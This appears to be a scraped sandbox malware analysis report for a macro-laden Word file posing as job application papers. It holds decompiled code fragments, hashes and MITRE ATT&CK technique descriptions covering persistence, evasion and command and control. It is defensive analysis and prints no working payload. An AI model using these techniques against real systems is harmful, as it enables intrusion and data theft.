Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$std::locale::_$Exception@8Facet_RegisterThrow$InitLocimpLocimp::_New_SetgloballocaleYarn__onexit
String ID: ^\s*(?:g|graphviz)\s+([^\\\?%\*]+)\s*$$`7)
API String ID: 3878167811-1190115873
Opcode ID: 30b89f3f7c56df57e541751fb09518aea66e265cd5e3eab819d7d86214a71806
Instruction ID: 86604229266f31743cba18d4b736294232f2b4fa76c747b8d7a60ff45de70397
Opcode Fuzzy Hash: 30b89f3f7c56df57e541751fb09518aea66e265cd5e3eab819d7d86214a71806
Instruction Fuzzy Hash: 07E0D8B8AC6B016BE2803B716C53B1839949B46705F58443FF180361C2E7FD05104F7E

Uniqueness

Uniqueness Score: 100.00%

Function 0041373B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11
UNIQUE

Download Yara Rule

C-Code - Quality: 86%

			E0041373B(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				char _v20;
				void* _t15;
				void* _t20;
				void* _t26;

				_t26 = __eflags;
				E00413576( &_v20, _a4);
				E00416C8D( &_v20, "h�}D");
				asm("int3");
				_t20 = E00420A4A(_t15);
				_t16 =  *((intOrPtr*)(E00420A71(_t15, _t26) + 4));
				if( *((intOrPtr*)(E00420A71(_t15, _t26) + 4)) != 0) {
					E004209C4(__ebx, __edi, _t16);
				}
				return _t20;
			}

0x0041373b
0x00413747
0x00413755
0x0041375a
0x00413761
0x00413768
0x0041376d
0x00413770
0x00413776
0x0041377b

APIs

std::regex_error::regex_error.LIBCPMT ref: 00413747

Part of subcall function 00413576: std::exception::exception.LIBCONCRT ref: 0041358E

__CxxThrowException@8.LIBVCRUNTIME ref: 00413755

Part of subcall function 00416C8D: KiUserExceptionDispatcher.NTDLL(?,?,0041371A,?,00000008,?,1FFFFFFF,?,?,?,?,0041371A,?,00447D68,?), ref: 00416CEC

Strings

h}D, xrefs: 0041374C

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: DispatcherExceptionException@8ThrowUserstd::exception::exceptionstd::regex_error::regex_error
String ID: h}D
API String ID: 964721716-2622934311
Opcode ID: 42ac41a21001196e312108bbd3c64fccf43a8e96ca3a1cc200e16e5326563922
Instruction ID: 70e5861f5713f977b99f5b4a35597ad0922196d658aba9e869e763f056e74191
Opcode Fuzzy Hash: 42ac41a21001196e312108bbd3c64fccf43a8e96ca3a1cc200e16e5326563922
Instruction Fuzzy Hash: A7C01271C1420C66AB04FEA5CC468FE7B2CAA00640B90081AA62052042AB38A24586A8

Uniqueness

Uniqueness Score: 100.00%

Function 004101D7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E004101D7(CHAR* _a4) {

				return GetProcAddress(GetModuleHandleW(L"ntdll"), _a4);
			}

0x004101f0

APIs

GetModuleHandleW.KERNEL32(ntdll,00000000,?,0041021E,RtlInitUnicodeString,00000000,00000000,00000000,0041015F,00000000,00000000,02000000,00000001,00000000,0040F62D,00000001), ref: 004101E2
GetProcAddress.KERNEL32(00000000,?,0041021E,RtlInitUnicodeString,00000000,00000000,00000000,0041015F,00000000,00000000,02000000,00000001,00000000,0040F62D,00000001,0000000C), ref: 004101E9

Strings

ntdll, xrefs: 004101DD

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll
API String ID: 1646373207-3337577438
Opcode ID: 37f93d61928a5f04682e88b8e9272b239a08e3f5d7e9602223bba1695e2625a6
Instruction ID: e3bf78ee20e6146a4b7cb78c35166d5d0040dbd437ca3217cc7906435f393f35
Opcode Fuzzy Hash: 37f93d61928a5f04682e88b8e9272b239a08e3f5d7e9602223bba1695e2625a6
Instruction Fuzzy Hash: B8B09B31940248B78B001BE5FC0D8C53F5CDB4D6517004012F70D41430C67651D44759

Uniqueness

Uniqueness Score: 100.00%

Function 0042D44F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E0042D44F() {

				 *0x44e2a0 = GetCommandLineA();
				 *0x44e2a4 = GetCommandLineW();
				return 1;
			}

0x0042d455
0x0042d460
0x0042d467

APIs

GetCommandLineA.KERNEL32 ref: 0042D44F
GetCommandLineW.KERNEL32 ref: 0042D45A

Strings

p3&, xrefs: 0042D455

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: CommandLine
String ID: p3&
API String ID: 3253501508-2379633039
Opcode ID: 4f2328bde79ee6e0e3c6085c6f4a6bc0dcb88c8ae15381f876a74149840eb6a1
Instruction ID: 62d09de62a6c36c8a8d0b0fb4ca6f4ec178e880459519bd5e2edea133a6b37bb
Opcode Fuzzy Hash: 4f2328bde79ee6e0e3c6085c6f4a6bc0dcb88c8ae15381f876a74149840eb6a1
Instruction Fuzzy Hash: 82B092BC8083008FCB148F32B95C0453BB8F60A3123C024F5E445C2720D7784008EF08

Uniqueness

Uniqueness Score: 100.00%

Function 0042D44F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6UNIQUE

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 0042D44F
GetCommandLineW.KERNEL32 ref: 0042D45A

Strings

p3&, xrefs: 0042D455

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: CommandLine
String ID: p3&
API String ID: 3253501508-2379633039
Opcode ID: 4f2328bde79ee6e0e3c6085c6f4a6bc0dcb88c8ae15381f876a74149840eb6a1
Instruction ID: 62d09de62a6c36c8a8d0b0fb4ca6f4ec178e880459519bd5e2edea133a6b37bb
Opcode Fuzzy Hash: 4f2328bde79ee6e0e3c6085c6f4a6bc0dcb88c8ae15381f876a74149840eb6a1
Instruction Fuzzy Hash: 82B092BC8083008FCB148F32B95C0453BB8F60A3123C024F5E445C2720D7784008EF08

Uniqueness

Uniqueness Score: 100.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.
Tactics:	Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items . This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, `/Library/StartupItems` isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), `StartupParameters.plist` , reside in the top-level directory.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion, Persistence
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
Tactics:	Defense Evasion
Data Sources:	API monitoring, Anti-virus, File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Sarah_Siedler_Bewerbungsunterlagen.doc

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Static OLE Info

General

OLE File "word/vbaProject.bin"

Indicators

Streams with VBA

VBA File Name: IvHpl.bas, Stream Size: 1418

General

VBA Code Keywords

VBA Code

VBA File Name: NexFaBP.bas, Stream Size: 1565

General

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre